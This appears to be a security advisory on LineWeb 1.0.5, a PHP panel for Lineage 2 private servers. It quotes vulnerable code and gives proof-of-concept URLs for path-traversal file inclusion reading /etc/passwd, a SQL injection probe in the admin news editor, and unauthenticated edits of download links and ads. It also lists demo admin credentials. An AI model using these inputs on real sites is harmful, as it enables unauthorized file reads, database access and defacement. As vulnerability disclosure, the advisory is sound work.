LineWeb it's a web-app to manage Lineage 2 private severs, a very known mmorpg, and allows to do action such as:
Main Features:
Administrator Features:
Member Panel Features:
Live Demo Front : http://demo.l2web.org/
Live Demo Admin : http://demo.l2web.org/admin/
Demo Administrator Login:
user : demo
password : demo123
LFI:
We can found this part of code on index.php
<?php
if (isset($_GET['op']))
{
{
$op = "modules/" . $_GET['op'] . ".php";
}
if(!file_exists($op)) $op = "error.php";
} else $op = "main.php";
// include the page specified in the browser address field:
include($op);
?>
Wich allows us to include local files on index.php by using the $op variable, IE: http://localhost/Lineage
ACM/lineweb_1.0.5/index.php?op=…/…/…/…/…/…/…/etc/passwd
We also can find this vuln. in /admin/index.php, IE:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd
Strange behavior on op=register:
If we register a username twice, IE: username=o&password=12345&confirmpassword=12345&email=&submit2=Register
We get:
The username already exists.
But if we send a long string twice, IE:
username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaao&password=12345&confirmpassword=12345&email=&submit2=Register
We get:
Duplicate entry 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' for key 'PRIMARY'
їSQL Injection?
In admin/edit_news.php we can find this source:
65 elseif(isset($_GET['newsid']))
66 {
67
68 $result = mysql_query("SELECT * FROM news WHERE newsid='" . $_GET['newsid'] . "'");
69 while($myrow = mysql_fetch_array($result))
70 {
71
We can observe that it doesn't make any check at all any input that we make on $newsid, so if we inject a " ' " in:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
We get:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\Lineage
ACM\lineweb_1.0.5\admin\edit_news.php on line 69
We can find this vuln in: edit_news.php ; edit_downloads.php y edit_ads.php.
It requires magic_quotes = OFF
Edit without permission:
edit_downloads.php allows us to edit any download link, without any verification at all. By doing this, we could
trick the user to download an infected file.
The same happens on edit_ads.php, if we give to our URL values to ad_name y ad_content, we could get without any
verification, permission to edit news:
http://localhost/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA
By doing this we could make a HTML, XSS or CSS injection.
Ignacio Garrido,
Argentina.